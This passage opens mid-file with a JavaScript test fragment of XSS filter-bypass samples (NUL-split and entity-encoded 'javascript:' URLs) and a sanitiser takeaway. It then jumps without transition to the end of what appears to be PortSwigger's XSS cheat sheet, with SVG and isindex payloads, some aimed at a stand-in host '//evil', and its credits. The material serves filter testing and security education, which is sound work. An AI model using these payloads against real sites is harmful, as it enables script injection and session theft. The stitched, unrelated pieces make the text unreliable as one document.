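// an assumption; \u0000 marks it.
const SAMPLES = {
  nulAfterAmp:      "javascript:&\u0000#x6a;avascript:alert(1)",
  nulInNamedEntity: "javascript&col\u0000on;alert(1)",
  entityScheme:     "&#x6a;avascript:alert(1)",
  benign:           "https://example.test/page",
};

// Stand-alone run: one line per sample.
for (const [name, raw] of Object.entries(SAMPLES)) {
  const r = classify(raw);
  console.log(`${name.padEnd(17)} naive=${r.naive} normalised=${r.normalised} decoded=${JSON.stringify(r.decoded)}`);
}
```

The takeaway for a filter or sanitiser author: decode exactly as the consuming parser will (NUL handling, character references, control stripping) before applying any scheme rule, or better, resolve the value with the platform's own URL parser and allow-list the scheme.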
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src=//evil>
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil>
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.